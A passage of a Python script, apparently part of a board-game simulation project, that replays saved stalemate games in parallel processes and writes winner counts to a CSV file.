20000\n\n # Reset money.\n for player in game_to_play.active_players:\n player.money = 1500\n\n # Play the game.\n results = game_to_play.play()\n game_winners.append(results['winner'])\n\n results_q.put(game_winners)\n\n\ndef main():\n with open('results/stalemateStability_players.csv', 'w', newline='') as csvfile:\n output_file = csv.writer(csvfile, quotechar=',')\n total_sample_size = 1000\n for game_id in [21,49,18]:\n # Load in game data.\n game = pickle.load(open('results/stalemates/long/game' + str(game_id) + '.pickle', \"rb\"))\n\n procs = 4\n results_q = Queue() # Queue for results.\n proc_list = [] # List of processes.\n for i in range(procs):\n proc_list.append(Process(target=play_set, args=(int(total_sample_size / procs), game, results_q)))\n\n for proc in proc_list: # Start all processes.\n proc.start()\n\n for proc in proc_list: # Wait for all processes to finish.\n proc.join()\n\n results_list = []\n\n # Gather the results from each process.\n while not results_q.empty():\n results_list.extend(results_q.get())\n\n results = [game_id, results_list.count(0),results_list.count(1),results_list.count(2)]\n print(results)\n output_file.writerow(results)\n\n '''results.append(12-new_game.hotels)\n new_game.cutoff = 20000\n results = new_game.play()\n\n # Pickle it...like a cucumber!\n pickle.dump(new_game, open('results/stalemates/long/continued/game' + str(i) + '.pickle', 'wb'))\n\n for i in range(13):\n print(i,results.count(i))'''\n\n\nif __name__ == '__main__':\n main()","sub_path":"continueStalemates.py","file_name":"continueStalemates.py","file_ext":"py","file_size_in_byte":2131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}